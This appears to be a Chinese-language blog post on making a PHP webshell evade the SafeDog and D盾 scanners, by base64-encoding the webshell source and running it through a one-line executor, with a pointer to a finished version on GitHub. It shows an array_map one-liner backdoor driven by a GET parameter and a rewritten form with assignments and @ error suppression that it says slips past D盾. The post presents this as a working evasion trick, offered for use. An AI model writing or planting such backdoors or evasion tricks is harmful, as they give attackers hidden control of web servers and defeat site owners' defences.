0x00 介绍

前篇文章我与某狗的恩恩怨怨也介绍了一种，免杀大马的姿势，今天再介绍一种，思路来源T00ls论坛。

0x01 源码

还是一样大马源码一份，然后base64加密。
直接上代码了。

本地测试过狗过D盾，当然这是静态免杀。
感觉你们会觉得我不上图，不信我，那就自己动手手试试= =。

0x02 思路

可以看到首先base64加密，然后就像编写一句话一样，去执行我们的代码，也就是base64加密的的，思路还是可以扩展很多的，但是会waf拦截某些函数执行，就换份大马源码，但是这种方法过狗足够了。

0x03 成品

上传到GitHub了 下载地址
另外这个大马是国外的，用不习惯的自行加密更换

补图：(1.php是大马)

代码

array_map()

array_map() 函数将用户自定义函数作用到数组中的每个值上, 并返回用户自定义函数作用后的带有新值的数组

初始代码

array_map($_GET['1'],$$a);
D盾 一级

但 D盾 不拦截赋值语句

array_map($b=$_GET['1'],$c=$a);

绕过

加上 @ 关闭错误回显